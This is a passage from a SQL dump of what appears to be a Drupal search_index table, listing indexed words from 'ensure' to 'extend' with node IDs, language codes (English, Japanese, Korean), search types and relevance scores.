('ensure', 67, 'ja', 'node_search', 1),
('ensures', 136, 'en', 'node_search', 1),
('ensures', 138, 'en', 'node_search', 1),
('ensuring', 66, 'en', 'node_search', 1),
('ensuring', 135, 'en', 'node_search', 1),
('enter', 1, 'en', 'help_search', 1),
('enter', 1, 'ja', 'help_search', 1),
('enter', 1, 'ko', 'help_search', 1),
('enter', 4, 'en', 'help_search', 1),
('enter', 4, 'ja', 'help_search', 1),
('enter', 4, 'ko', 'help_search', 1),
('enter', 5, 'en', 'help_search', 1),
('enter', 5, 'ja', 'help_search', 1),
('enter', 5, 'ko', 'help_search', 1),
('enter', 7, 'en', 'help_search', 1),
('enter', 7, 'ja', 'help_search', 1),
('enter', 7, 'ko', 'help_search', 1),
('enter', 8, 'en', 'help_search', 1),
('enter', 8, 'ja', 'help_search', 1),
('enter', 8, 'ko', 'help_search', 1),
('enter', 16, 'en', 'help_search', 1),
('enter', 16, 'ja', 'help_search', 1),
('enter', 16, 'ko', 'help_search', 1),
('enter', 24, 'en', 'help_search', 2),
('enter', 24, 'ja', 'help_search', 2),
('enter', 24, 'ko', 'help_search', 2),
('enter', 27, 'en', 'help_search', 2),
('enter', 27, 'ja', 'help_search', 2),
('enter', 27, 'ko', 'help_search', 2),
('enter', 28, 'en', 'help_search', 0.913226),
('enter', 28, 'ja', 'help_search', 0.913226),
('enter', 28, 'ko', 'help_search', 0.913226),
('enter', 31, 'en', 'node_search', 0.889397),
('enter', 45, 'en', 'help_search', 1),
('enter', 45, 'ja', 'help_search', 1),
('enter', 45, 'ko', 'help_search', 1),
('enter', 48, 'en', 'help_search', 2),
('enter', 48, 'ja', 'help_search', 2),
('enter', 48, 'ko', 'help_search', 2),
('enter', 49, 'en', 'help_search', 1),
('enter', 49, 'ja', 'help_search', 1),
('enter', 49, 'ko', 'help_search', 1),
('enter', 52, 'en', 'help_search', 1),
('enter', 52, 'ja', 'help_search', 1),
('enter', 52, 'ko', 'help_search', 1),
('enter', 54, 'en', 'help_search', 1),
('enter', 54, 'ja', 'help_search', 1),
('enter', 54, 'ko', 'help_search', 1),
('enter', 56, 'en', 'help_search', 3),
('enter', 56, 'ja', 'help_search', 3),
('enter', 56, 'ko', 'help_search', 3),
('enter', 57, 'en', 'help_search', 2),
('enter', 57, 'ja', 'help_search', 2),
('enter', 57, 'ko', 'help_search', 2),
('enter', 59, 'en', 'help_search', 1),
('enter', 59, 'ja', 'help_search', 1),
('enter', 59, 'ko', 'help_search', 1),
('enter', 60, 'en', 'help_search', 2),
('enter', 60, 'ja', 'help_search', 2),
('enter', 60, 'ko', 'help_search', 2),
('enter', 61, 'en', 'help_search', 1),
('enter', 61, 'ja', 'help_search', 1),
('enter', 61, 'ko', 'help_search', 1),
('enter', 63, 'en', 'help_search', 1),
('enter', 63, 'ja', 'help_search', 1),
('enter', 63, 'ko', 'help_search', 1),
('enter', 66, 'en', 'help_search', 1),
('enter', 66, 'ja', 'help_search', 1),
('enter', 67, 'en', 'help_search', 1),
('enter', 67, 'ja', 'help_search', 1),
('enter', 67, 'ko', 'help_search', 1),
('enter', 71, 'en', 'help_search', 1),
('enter', 71, 'ja', 'help_search', 1),
('enter', 71, 'ko', 'help_search', 1),
('enter', 72, 'en', 'help_search', 1.9689),
('enter', 72, 'ja', 'help_search', 1.9689),
('enter', 72, 'ko', 'help_search', 1.9689),
('enter', 74, 'en', 'help_search', 1),
('enter', 74, 'ja', 'help_search', 1),
('enter', 74, 'ko', 'help_search', 1),
('enter', 75, 'en', 'help_search', 1),
('enter', 75, 'ja', 'help_search', 1),
('enter', 75, 'ko', 'help_search', 1),
('enter', 79, 'en', 'help_search', 2),
('enter', 79, 'ja', 'help_search', 2),
('enter', 79, 'ko', 'help_search', 2),
('enter', 80, 'en', 'help_search', 1),
('enter', 80, 'ja', 'help_search', 1),
('enter', 80, 'ko', 'help_search', 1),
('enter', 82, 'en', 'help_search', 1),
('enter', 82, 'ja', 'help_search', 1),
('enter', 82, 'ko', 'help_search', 1),
('enter', 83, 'en', 'help_search', 1),
('enter', 83, 'ja', 'help_search', 1),
('enter', 83, 'ko', 'help_search', 1),
('enter', 87, 'en', 'help_search', 2),
('enter', 87, 'ja', 'help_search', 2),
('enter', 87, 'ko', 'help_search', 2),
('enter', 88, 'en', 'help_search', 1),
('enter', 88, 'ja', 'help_search', 1),
('enter', 88, 'ko', 'help_search', 1),
('enter', 90, 'en', 'help_search', 2),
('enter', 90, 'ja', 'help_search', 2),
('enter', 90, 'ko', 'help_search', 2),
('entered', 24, 'en', 'help_search', 1),
('entered', 24, 'ja', 'help_search', 1),
('entered', 24, 'ko', 'help_search', 1),
('entered', 27, 'en', 'help_search', 1),
('entered', 27, 'ja', 'help_search', 1),
('entered', 27, 'ko', 'help_search', 1),
('entering', 68, 'en', 'node_search', 1),
('entering', 68, 'ja', 'node_search', 1),
('entering', 72, 'en', 'help_search', 1),
('entering', 72, 'ja', 'help_search', 1),
('entering', 72, 'ko', 'help_search', 1),
('enters', 68, 'en', 'help_search', 1),
('enters', 68, 'ja', 'help_search', 1),
('enters', 68, 'ko', 'help_search', 1),
('enthusiasts', 66, 'en', 'node_search', 32),
('entire', 156, 'en', 'node_search', 1),
('entire', 157, 'en', 'node_search', 1),
('entities', 7, 'en', 'help_search', 1),
('entities', 7, 'ja', 'help_search', 1),
('entities', 7, 'ko', 'help_search', 1),
('entities', 8, 'en', 'help_search', 1),
('entities', 8, 'ja', 'help_search', 1),
('entities', 8, 'ko', 'help_search', 1),
('entities', 9, 'en', 'help_search', 2),
('entities', 9, 'ja', 'help_search', 2),
('entities', 9, 'ko', 'help_search', 2),
('entities', 11, 'en', 'help_search', 2.88282),
('entities', 11, 'ja', 'help_search', 2.88282),
('entities', 11, 'ko', 'help_search', 2.88282),
('entities', 16, 'en', 'help_search', 2),
('entities', 16, 'ja', 'help_search', 2),
('entities', 16, 'ko', 'help_search', 2),
('entities', 27, 'en', 'help_search', 1),
('entities', 27, 'ja', 'help_search', 1),
('entities', 27, 'ko', 'help_search', 1),
('entities', 29, 'en', 'help_search', 1),
('entities', 29, 'ja', 'help_search', 1),
('entities', 29, 'ko', 'help_search', 1),
('entities', 30, 'en', 'help_search', 2),
('entities', 30, 'ja', 'help_search', 2),
('entities', 30, 'ko', 'help_search', 2),
('entities', 31, 'ja', 'help_search', 4.71418),
('entities', 35, 'en', 'help_search', 3),
('entities', 35, 'ja', 'help_search', 3),
('entities', 35, 'ko', 'help_search', 3),
('entities', 44, 'en', 'help_search', 6),
('entities', 44, 'ja', 'help_search', 6),
('entities', 44, 'ko', 'help_search', 6),
('entities', 54, 'en', 'help_search', 1),
('entities', 54, 'ja', 'help_search', 1),
('entities', 54, 'ko', 'help_search', 1),
('entities', 62, 'en', 'help_search', 1),
('entities', 62, 'ja', 'help_search', 1),
('entities', 62, 'ko', 'help_search', 1),
('entities', 79, 'en', 'help_search', 1),
('entities', 79, 'ja', 'help_search', 1),
('entities', 79, 'ko', 'help_search', 1),
('entities', 80, 'en', 'help_search', 3.92384),
('entities', 80, 'ja', 'help_search', 3.92384),
('entities', 80, 'ko', 'help_search', 3.92384),
('entities', 92, 'en', 'help_search', 2),
('entities', 92, 'ja', 'help_search', 2),
('entities', 92, 'ko', 'help_search', 2),
('entity', 7, 'en', 'help_search', 10.8444),
('entity', 7, 'ja', 'help_search', 10.8444),
('entity', 7, 'ko', 'help_search', 10.8444),
('entity', 8, 'en', 'help_search', 5),
('entity', 8, 'ja', 'help_search', 5),
('entity', 8, 'ko', 'help_search', 5),
('entity', 9, 'en', 'help_search', 5),
('entity', 9, 'ja', 'help_search', 5),
('entity', 9, 'ko', 'help_search', 5),
('entity', 11, 'en', 'help_search', 4),
('entity', 11, 'ja', 'help_search', 4),
('entity', 11, 'ko', 'help_search', 4),
('entity', 16, 'en', 'help_search', 3),
('entity', 16, 'ja', 'help_search', 3),
('entity', 16, 'ko', 'help_search', 3),
('entity', 23, 'en', 'node_search', 1),
('entity', 24, 'en', 'help_search', 30),
('entity', 24, 'ja', 'help_search', 30),
('entity', 24, 'ko', 'help_search', 30),
('entity', 25, 'en', 'help_search', 30),
('entity', 25, 'ja', 'help_search', 30),
('entity', 26, 'en', 'help_search', 30),
('entity', 26, 'ja', 'help_search', 30),
('entity', 26, 'ko', 'help_search', 30),
('entity', 27, 'en', 'help_search', 34),
('entity', 27, 'ja', 'help_search', 34),
('entity', 27, 'ko', 'help_search', 34),
('entity', 29, 'en', 'help_search', 2),
('entity', 29, 'ja', 'help_search', 2),
('entity', 29, 'ko', 'help_search', 2),
('entity', 30, 'en', 'help_search', 1),
('entity', 30, 'ja', 'help_search', 1),
('entity', 30, 'ko', 'help_search', 1),
('entity', 31, 'ja', 'help_search', 49.9515),
('entity', 35, 'en', 'help_search', 1),
('entity', 35, 'ja', 'help_search', 1),
('entity', 35, 'ko', 'help_search', 1),
('entity', 54, 'en', 'help_search', 2),
('entity', 54, 'ja', 'help_search', 2),
('entity', 54, 'ko', 'help_search', 2),
('entity', 62, 'en', 'help_search', 3),
('entity', 62, 'ja', 'help_search', 3),
('entity', 62, 'ko', 'help_search', 3),
('entity', 79, 'en', 'help_search', 7),
('entity', 79, 'ja', 'help_search', 7),
('entity', 79, 'ko', 'help_search', 7),
('entity', 80, 'en', 'help_search', 3),
('entity', 80, 'ja', 'help_search', 3),
('entity', 80, 'ko', 'help_search', 3),
('entity', 92, 'en', 'help_search', 8),
('entity', 92, 'ja', 'help_search', 8),
('entity', 92, 'ko', 'help_search', 8),
('entries', 11, 'en', 'help_search', 1),
('entries', 11, 'ja', 'help_search', 1),
('entries', 11, 'ko', 'help_search', 1),
('entries', 62, 'en', 'help_search', 1),
('entries', 62, 'ja', 'help_search', 1),
('entries', 62, 'ko', 'help_search', 1),
('entry', 30, 'en', 'node_search', 2),
('environment', 120, 'en', 'node_search', 1),
('environment', 184, 'en', 'node_search', 1),
('environment', 186, 'en', 'node_search', 1),
('environment', 197, 'en', 'node_search', 1),
('environments', 138, 'en', 'node_search', 1),
('equip', 140, 'en', 'node_search', 1),
('equipment', 27, 'en', 'node_search', 0.942091),
('equipment', 30, 'en', 'node_search', 2),
('equipped', 142, 'en', 'node_search', 1),
('error', 34, 'en', 'help_search', 1),
('error', 34, 'ja', 'help_search', 1),
('error', 34, 'ko', 'help_search', 1),
('error', 42, 'en', 'help_search', 1),
('error', 42, 'ja', 'help_search', 1),
('error', 42, 'ko', 'help_search', 1),
('error', 72, 'en', 'help_search', 36.6811),
('error', 72, 'ja', 'help_search', 36.6811),
('error', 72, 'ko', 'help_search', 36.6811),
('error', 76, 'en', 'help_search', 1),
('error', 76, 'ja', 'help_search', 1),
('error', 76, 'ko', 'help_search', 1),
('errors', 42, 'en', 'help_search', 4.98493),
('errors', 42, 'ja', 'help_search', 4.98493),
('errors', 42, 'ko', 'help_search', 4.98493),
('errors', 72, 'en', 'help_search', 28.6271),
('errors', 72, 'ja', 'help_search', 28.6271),
('errors', 72, 'ko', 'help_search', 28.6271),
('errors', 76, 'en', 'help_search', 1),
('errors', 76, 'ja', 'help_search', 1),
('errors', 76, 'ko', 'help_search', 1),
('essential', 140, 'en', 'node_search', 1),
('essential', 142, 'en', 'node_search', 1),
('established', 23, 'en', 'node_search', 1),
('established', 24, 'en', 'node_search', 0.839384),
('established', 26, 'en', 'node_search', 2),
('established', 27, 'en', 'node_search', 0.674137),
('estimate', 29, 'en', 'node_search', 3),
('etc', 23, 'en', 'node_search', 0.879565),
('etc', 24, 'en', 'node_search', 1.88282),
('etc', 27, 'en', 'node_search', 1),
('etc', 30, 'en', 'node_search', 2),
('etc', 31, 'ja', 'help_search', 1),
('etc', 41, 'en', 'help_search', 1),
('etc', 41, 'ja', 'help_search', 1),
('etc', 41, 'ko', 'help_search', 1),
('etc', 88, 'en', 'help_search', 1),
('etc', 88, 'ja', 'help_search', 1),
('etc', 88, 'ko', 'help_search', 1),
('etc', 93, 'en', 'help_search', 3.89608),
('etc', 93, 'ja', 'help_search', 3.89608),
('etc', 93, 'ko', 'help_search', 3.89608),
('ethical', 24, 'en', 'node_search', 0.854391),
('ethical', 24, 'ja', 'node_search', 0.478227),
('ethnic', 23, 'en', 'node_search', 0.957226),
('etiquette', 133, 'en', 'node_search', 1),
('evaluated', 50, 'en', 'help_search', 1),
('evaluated', 50, 'ja', 'help_search', 1),
('evaluated', 50, 'ko', 'help_search', 1),
('evaluating', 50, 'en', 'help_search', 1),
('evaluating', 50, 'ja', 'help_search', 1),
('evaluating', 50, 'ko', 'help_search', 1),
('even', 3, 'en', 'node_search', 1),
('even', 3, 'ko', 'node_search', 1),
('even', 24, 'en', 'node_search', 0.769219),
('even', 182, 'en', 'node_search', 1),
('events', 62, 'en', 'help_search', 1),
('events', 62, 'ja', 'help_search', 1),
('events', 62, 'ko', 'help_search', 1),
('every', 32, 'en', 'help_search', 3.93972),
('every', 32, 'ja', 'help_search', 3.93972),
('every', 32, 'ko', 'help_search', 3.93972),
('every', 122, 'en', 'node_search', 1),
('every', 166, 'en', 'node_search', 1),
('every', 170, 'en', 'node_search', 1),
('every', 185, 'en', 'node_search', 1),
('every', 187, 'en', 'node_search', 1),
('every', 190, 'en', 'node_search', 1),
('every', 191, 'en', 'node_search', 1),
('every', 195, 'en', 'node_search', 1),
('every', 197, 'en', 'node_search', 1),
('every', 199, 'en', 'node_search', 1),
('everyone', 67, 'ja', 'node_search', 31),
('everyone', 120, 'en', 'node_search', 1),
('everything', 69, 'en', 'node_search', 1),
('everything', 116, 'en', 'node_search', 1),
('exact', 68, 'en', 'help_search', 1),
('exact', 68, 'ja', 'help_search', 1),
('exact', 68, 'ko', 'help_search', 1),
('exact', 89, 'en', 'help_search', 1),
('exact', 89, 'ja', 'help_search', 1),
('exact', 89, 'ko', 'help_search', 1),
('exam', 3, 'en', 'node_search', 1),
('exam', 3, 'ko', 'node_search', 1),
('exam', 6, 'en', 'node_search', 3),
('exam', 31, 'en', 'node_search', 1.76566),
('exam', 66, 'en', 'node_search', 1),
('exam', 142, 'en', 'node_search', 1);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('examination', 155, 'en', 'node_search', 2),
('examination', 181, 'en', 'node_search', 30),
('examination', 182, 'en', 'node_search', 5),
('examination', 183, 'en', 'node_search', 5),
('example', 7, 'en', 'help_search', 1),
('example', 7, 'ja', 'help_search', 1),
('example', 7, 'ko', 'help_search', 1),
('example', 9, 'en', 'help_search', 1),
('example', 9, 'ja', 'help_search', 1),
('example', 9, 'ko', 'help_search', 1),
('example', 11, 'en', 'help_search', 1),
('example', 11, 'ja', 'help_search', 1),
('example', 11, 'ko', 'help_search', 1),
('example', 21, 'en', 'help_search', 1),
('example', 21, 'ja', 'help_search', 1),
('example', 21, 'ko', 'help_search', 1),
('example', 22, 'en', 'help_search', 1),
('example', 22, 'ja', 'help_search', 1),
('example', 22, 'ko', 'help_search', 1),
('example', 24, 'en', 'help_search', 1),
('example', 24, 'ja', 'help_search', 1),
('example', 24, 'ko', 'help_search', 1),
('example', 25, 'en', 'help_search', 1),
('example', 25, 'ja', 'help_search', 1),
('example', 26, 'en', 'help_search', 1),
('example', 26, 'ja', 'help_search', 1),
('example', 26, 'ko', 'help_search', 1),
('example', 27, 'en', 'help_search', 2),
('example', 27, 'ja', 'help_search', 2),
('example', 27, 'ko', 'help_search', 2),
('example', 28, 'en', 'help_search', 0.830633),
('example', 28, 'ja', 'help_search', 0.830633),
('example', 28, 'ko', 'help_search', 0.830633),
('example', 29, 'en', 'help_search', 1),
('example', 29, 'ja', 'help_search', 1),
('example', 29, 'ko', 'help_search', 1),
('example', 30, 'en', 'help_search', 2.89272),
('example', 30, 'ja', 'help_search', 2.89272),
('example', 30, 'ko', 'help_search', 2.89272),
('example', 31, 'ja', 'help_search', 4.76159),
('example', 39, 'en', 'help_search', 1),
('example', 39, 'ja', 'help_search', 1),
('example', 39, 'ko', 'help_search', 1),
('example', 48, 'en', 'help_search', 1),
('example', 48, 'ja', 'help_search', 1),
('example', 48, 'ko', 'help_search', 1),
('example', 50, 'en', 'help_search', 1),
('example', 50, 'ja', 'help_search', 1),
('example', 50, 'ko', 'help_search', 1),
('example', 59, 'en', 'help_search', 1),
('example', 59, 'ja', 'help_search', 1),
('example', 59, 'ko', 'help_search', 1),
('example', 61, 'en', 'help_search', 2),
('example', 61, 'ja', 'help_search', 2),
('example', 61, 'ko', 'help_search', 2),
('example', 62, 'en', 'help_search', 1),
('example', 62, 'ja', 'help_search', 1),
('example', 62, 'ko', 'help_search', 1),
('example', 63, 'en', 'help_search', 2),
('example', 63, 'ja', 'help_search', 2),
('example', 63, 'ko', 'help_search', 2),
('example', 65, 'en', 'help_search', 3),
('example', 65, 'ja', 'help_search', 3),
('example', 65, 'ko', 'help_search', 3),
('example', 68, 'en', 'help_search', 1.96498),
('example', 68, 'ja', 'help_search', 1.96498),
('example', 68, 'ko', 'help_search', 1.96498),
('example', 72, 'en', 'help_search', 0.989021),
('example', 72, 'ja', 'help_search', 0.989021),
('example', 72, 'ko', 'help_search', 0.989021),
('example', 75, 'en', 'help_search', 1),
('example', 75, 'ja', 'help_search', 1),
('example', 75, 'ko', 'help_search', 1),
('example', 79, 'en', 'help_search', 2),
('example', 79, 'ja', 'help_search', 2),
('example', 79, 'ko', 'help_search', 2),
('example', 80, 'en', 'help_search', 3),
('example', 80, 'ja', 'help_search', 3),
('example', 80, 'ko', 'help_search', 3),
('example', 91, 'en', 'help_search', 1),
('example', 91, 'ja', 'help_search', 1),
('example', 91, 'ko', 'help_search', 1),
('example', 92, 'en', 'help_search', 1),
('example', 92, 'ja', 'help_search', 1),
('example', 92, 'ko', 'help_search', 1),
('example', 93, 'en', 'help_search', 1.8249),
('example', 93, 'ja', 'help_search', 1.8249),
('example', 93, 'ko', 'help_search', 1.8249),
('examplecom', 50, 'en', 'help_search', 4),
('examplecom', 50, 'ja', 'help_search', 4),
('examplecom', 50, 'ko', 'help_search', 4),
('examplecom', 63, 'en', 'help_search', 4),
('examplecom', 63, 'ja', 'help_search', 4),
('examplecom', 63, 'ko', 'help_search', 4),
('examplecom', 65, 'en', 'help_search', 12),
('examplecom', 65, 'ja', 'help_search', 12),
('examplecom', 65, 'ko', 'help_search', 12),
('examplecom', 72, 'en', 'help_search', 7.8309),
('examplecom', 72, 'ja', 'help_search', 7.8309),
('examplecom', 72, 'ko', 'help_search', 7.8309),
('examples', 35, 'en', 'help_search', 1),
('examples', 35, 'ja', 'help_search', 1),
('examples', 35, 'ko', 'help_search', 1),
('examples', 65, 'en', 'help_search', 1),
('examples', 65, 'ja', 'help_search', 1),
('examples', 65, 'ko', 'help_search', 1),
('examples', 80, 'en', 'help_search', 2),
('examples', 80, 'ja', 'help_search', 2),
('examples', 80, 'ko', 'help_search', 2),
('exceed', 7, 'en', 'help_search', 1),
('exceed', 7, 'ja', 'help_search', 1),
('exceed', 7, 'ko', 'help_search', 1),
('excel', 116, 'en', 'node_search', 1),
('excel', 120, 'en', 'node_search', 1),
('excel', 156, 'en', 'node_search', 1),
('excel', 157, 'en', 'node_search', 1),
('excellent', 81, 'en', 'node_search', 4),
('except', 93, 'en', 'help_search', 0.916736),
('except', 93, 'ja', 'help_search', 0.916736),
('except', 93, 'ko', 'help_search', 0.916736),
('exchange', 174, 'en', 'node_search', 1),
('exchanged', 44, 'en', 'help_search', 2),
('exchanged', 44, 'ja', 'help_search', 2),
('exchanged', 44, 'ko', 'help_search', 2),
('exciting', 66, 'en', 'node_search', 32),
('exciting', 162, 'en', 'node_search', 2),
('exciting', 164, 'en', 'node_search', 1),
('exciting', 166, 'en', 'node_search', 1),
('exciting', 167, 'en', 'node_search', 1),
('exciting', 173, 'en', 'node_search', 1),
('exciting', 175, 'en', 'node_search', 1),
('exciting', 176, 'en', 'node_search', 1),
('exciting', 187, 'en', 'node_search', 1),
('exciting', 190, 'en', 'node_search', 1),
('exciting', 194, 'en', 'node_search', 1),
('excluding', 62, 'en', 'node_search', 1.81062),
('exclusive', 62, 'en', 'node_search', 29),
('exemplary', 80, 'en', 'node_search', 1),
('exemployees', 27, 'en', 'node_search', 1),
('exercises', 138, 'en', 'node_search', 1),
('exist', 72, 'en', 'help_search', 1),
('exist', 72, 'ja', 'help_search', 1),
('exist', 72, 'ko', 'help_search', 1),
('existence', 27, 'en', 'node_search', 0.824901),
('existing', 23, 'en', 'help_search', 0.993146),
('existing', 23, 'ja', 'help_search', 0.993146),
('existing', 23, 'ko', 'help_search', 0.993146),
('existing', 28, 'en', 'help_search', 0.927431),
('existing', 28, 'ja', 'help_search', 0.927431),
('existing', 28, 'ko', 'help_search', 0.927431),
('existing', 43, 'en', 'help_search', 0.938382),
('existing', 43, 'ja', 'help_search', 0.938382),
('existing', 43, 'ko', 'help_search', 0.938382),
('existing', 54, 'en', 'help_search', 1),
('existing', 54, 'ja', 'help_search', 1),
('existing', 54, 'ko', 'help_search', 1),
('existing', 55, 'en', 'help_search', 1),
('existing', 55, 'ja', 'help_search', 1),
('existing', 55, 'ko', 'help_search', 1),
('existing', 64, 'en', 'help_search', 1),
('existing', 64, 'ja', 'help_search', 1),
('existing', 64, 'ko', 'help_search', 1),
('existing', 66, 'en', 'help_search', 1),
('existing', 66, 'ja', 'help_search', 1),
('existing', 80, 'en', 'help_search', 1),
('existing', 80, 'ja', 'help_search', 1),
('existing', 80, 'ko', 'help_search', 1),
('existing', 85, 'en', 'help_search', 1),
('existing', 85, 'ja', 'help_search', 1),
('existing', 85, 'ko', 'help_search', 1),
('existing', 87, 'en', 'help_search', 1),
('existing', 87, 'ja', 'help_search', 1),
('existing', 87, 'ko', 'help_search', 1),
('existing', 88, 'en', 'help_search', 29),
('existing', 88, 'ja', 'help_search', 29),
('existing', 88, 'ko', 'help_search', 29),
('existing', 89, 'en', 'help_search', 2),
('existing', 89, 'ja', 'help_search', 2),
('existing', 89, 'ko', 'help_search', 2),
('existing', 91, 'en', 'help_search', 28),
('existing', 91, 'ja', 'help_search', 28),
('existing', 91, 'ko', 'help_search', 28),
('exists', 72, 'en', 'help_search', 1),
('exists', 72, 'ja', 'help_search', 1),
('exists', 72, 'ko', 'help_search', 1),
('exists', 89, 'en', 'help_search', 1),
('exists', 89, 'ja', 'help_search', 1),
('exists', 89, 'ko', 'help_search', 1),
('expand', 62, 'en', 'node_search', 1),
('expand', 74, 'en', 'help_search', 1),
('expand', 74, 'ja', 'help_search', 1),
('expand', 74, 'ko', 'help_search', 1),
('expanded', 56, 'en', 'help_search', 4),
('expanded', 56, 'ja', 'help_search', 4),
('expanded', 56, 'ko', 'help_search', 4),
('expect', 68, 'en', 'help_search', 1),
('expect', 68, 'ja', 'help_search', 1),
('expect', 68, 'ko', 'help_search', 1),
('expected', 34, 'en', 'help_search', 1),
('expected', 34, 'ja', 'help_search', 1),
('expected', 34, 'ko', 'help_search', 1),
('expected', 162, 'en', 'node_search', 1),
('expenses', 8, 'en', 'node_search', 4),
('expenses', 18, 'en', 'node_search', 1),
('expenses', 18, 'ko', 'node_search', 1),
('expenses', 31, 'en', 'node_search', 1),
('experience', 4, 'en', 'node_search', 1),
('experience', 4, 'ja', 'node_search', 1),
('experience', 7, 'en', 'node_search', 2),
('experience', 7, 'ko', 'node_search', 2),
('experience', 10, 'en', 'node_search', 6),
('experience', 10, 'ko', 'node_search', 6),
('experience', 18, 'en', 'node_search', 1),
('experience', 18, 'ko', 'node_search', 1),
('experience', 30, 'en', 'node_search', 4),
('experience', 62, 'en', 'node_search', 1),
('experience', 66, 'en', 'node_search', 1.96109),
('experience', 89, 'en', 'help_search', 0.997306),
('experience', 89, 'ja', 'help_search', 0.993146),
('experience', 89, 'ko', 'help_search', 0.997306),
('experience', 98, 'en', 'node_search', 1),
('experience', 116, 'en', 'node_search', 1),
('experience', 133, 'en', 'node_search', 1),
('experience', 135, 'en', 'node_search', 1),
('experience', 136, 'en', 'node_search', 2),
('experience', 162, 'en', 'node_search', 0.892724),
('experience', 163, 'en', 'node_search', 2.93105),
('experience', 164, 'en', 'node_search', 1),
('experience', 165, 'en', 'node_search', 1),
('experience', 167, 'en', 'node_search', 1),
('experience', 169, 'en', 'node_search', 1),
('experience', 171, 'en', 'node_search', 1),
('experience', 176, 'en', 'node_search', 1),
('experience', 185, 'en', 'node_search', 1),
('experience', 187, 'en', 'node_search', 1),
('experience', 190, 'en', 'node_search', 1),
('experience', 193, 'en', 'node_search', 1),
('experience', 194, 'en', 'node_search', 28),
('experience', 198, 'en', 'node_search', 1),
('experienced', 7, 'en', 'node_search', 4),
('experienced', 7, 'ko', 'node_search', 6),
('experienced', 18, 'en', 'node_search', 1),
('experienced', 18, 'ko', 'node_search', 1),
('experienced', 67, 'ja', 'node_search', 1),
('experienced', 135, 'en', 'node_search', 1),
('experienced', 136, 'en', 'node_search', 1),
('experienced', 138, 'en', 'node_search', 1),
('experiencemoreover', 138, 'en', 'node_search', 1),
('experiences', 67, 'ja', 'node_search', 1),
('experiences', 95, 'en', 'node_search', 1),
('experiences', 175, 'en', 'node_search', 1),
('experiences', 177, 'en', 'node_search', 1),
('experiences', 184, 'en', 'node_search', 1),
('experiences', 192, 'en', 'node_search', 1),
('experimental', 33, 'en', 'help_search', 24),
('experimental', 33, 'ja', 'help_search', 24),
('experimental', 33, 'ko', 'help_search', 24),
('experimental', 74, 'en', 'help_search', 1),
('experimental', 74, 'ja', 'help_search', 1),
('experimental', 74, 'ko', 'help_search', 1),
('expert', 8, 'en', 'node_search', 27),
('expert', 10, 'en', 'node_search', 28),
('expert', 10, 'ko', 'node_search', 28),
('expert', 27, 'en', 'node_search', 0.635),
('expertise', 62, 'en', 'node_search', 1),
('experts', 7, 'en', 'node_search', 2),
('experts', 7, 'ko', 'node_search', 2),
('experts', 31, 'en', 'node_search', 1),
('expiring', 86, 'en', 'help_search', 1),
('expiring', 86, 'ja', 'help_search', 1),
('expiring', 86, 'ko', 'help_search', 1),
('explain', 81, 'en', 'help_search', 1),
('explain', 81, 'ja', 'help_search', 1),
('explain', 81, 'ko', 'help_search', 1),
('explained', 6, 'en', 'node_search', 3),
('explained', 29, 'en', 'node_search', 28),
('explaining', 23, 'en', 'help_search', 0.902857),
('explaining', 23, 'ja', 'help_search', 0.902857),
('explaining', 23, 'ko', 'help_search', 0.902857),
('explore', 1, 'en', 'node_search', 1),
('export', 12, 'en', 'help_search', 8),
('export', 12, 'ja', 'help_search', 8),
('export', 12, 'ko', 'help_search', 8),
('export', 13, 'en', 'help_search', 7),
('export', 13, 'ja', 'help_search', 7),
('export', 13, 'ko', 'help_search', 7),
('export', 30, 'en', 'help_search', 1.51419),
('export', 30, 'ja', 'help_search', 1.51419),
('export', 30, 'ko', 'help_search', 1.51419),
('exported', 12, 'en', 'help_search', 1),
('exported', 12, 'ja', 'help_search', 1),
('exported', 12, 'ko', 'help_search', 1),
('exported', 14, 'en', 'help_search', 1),
('exported', 14, 'ja', 'help_search', 1),
('exported', 14, 'ko', 'help_search', 1),
('exported', 15, 'en', 'help_search', 1),
('exported', 15, 'ja', 'help_search', 1),
('exported', 15, 'ko', 'help_search', 1),
('exported', 30, 'en', 'help_search', 7.41884),
('exported', 30, 'ja', 'help_search', 7.41884),
('exported', 30, 'ko', 'help_search', 7.41884),
('exporting', 12, 'en', 'help_search', 26),
('exporting', 12, 'ja', 'help_search', 26),
('exporting', 12, 'ko', 'help_search', 26),
('exporting', 13, 'en', 'help_search', 26),
('exporting', 13, 'ja', 'help_search', 26),
('exporting', 13, 'ko', 'help_search', 26),
('exporting', 14, 'en', 'help_search', 1),
('exporting', 14, 'ja', 'help_search', 1),
('exporting', 14, 'ko', 'help_search', 1),
('exporting', 15, 'en', 'help_search', 1),
('exporting', 15, 'ja', 'help_search', 1),
('exporting', 15, 'ko', 'help_search', 1),
('exporting', 30, 'en', 'help_search', 1.65163),
('exporting', 30, 'ja', 'help_search', 1.65163),
('exporting', 30, 'ko', 'help_search', 1.65163),
('expose', 39, 'en', 'help_search', 1),
('expose', 39, 'ja', 'help_search', 1),
('expose', 39, 'ko', 'help_search', 1),
('exposed', 93, 'en', 'help_search', 9.36248),
('exposed', 93, 'ja', 'help_search', 9.36248),
('exposed', 93, 'ko', 'help_search', 9.36248),
('exposes', 44, 'en', 'help_search', 2),
('exposes', 44, 'ja', 'help_search', 2),
('exposes', 44, 'ko', 'help_search', 2),
('express', 23, 'en', 'node_search', 0.830633),
('expressions', 24, 'en', 'node_search', 0.792123),
('extend', 29, 'en', 'help_search', 22),
('extend', 29, 'ja', 'help_search', 22),
('extend', 29, 'ko', 'help_search', 22),
('extend', 33, 'en', 'help_search', 11),
('extend', 33, 'ja', 'help_search', 11),
('extend', 33, 'ko', 'help_search', 11),
('extend', 43, 'en', 'help_search', 3.73881),
('extend', 43, 'ja', 'help_search', 3.73881),
('extend', 43, 'ko', 'help_search', 3.73881),
('extend', 45, 'en', 'help_search', 4),
('extend', 45, 'ja', 'help_search', 4),
('extend', 45, 'ko', 'help_search', 4),
('extend', 74, 'en', 'help_search', 8),
('extend', 74, 'ja', 'help_search', 8),
('extend', 74, 'ko', 'help_search', 8),
('extend', 75, 'en', 'help_search', 4),
('extend', 75, 'ja', 'help_search', 4),
('extend', 75, 'ko', 'help_search', 4),
('extend', 133, 'en', 'node_search', 1),
('extend', 160, 'en', 'node_search', 1),
('extend', 164, 'en', 'node_search', 1),
('extend', 165, 'en', 'node_search', 1),
('extend', 166, 'en', 'node_search', 1),
('extend', 168, 'en', 'node_search', 1),
('extend', 170, 'en', 'node_search', 1),
('extend', 171, 'en', 'node_search', 1),
('extend', 177, 'en', 'node_search', 1),
('extend', 189, 'en', 'node_search', 1),
('extend', 193, 'en', 'node_search', 1),
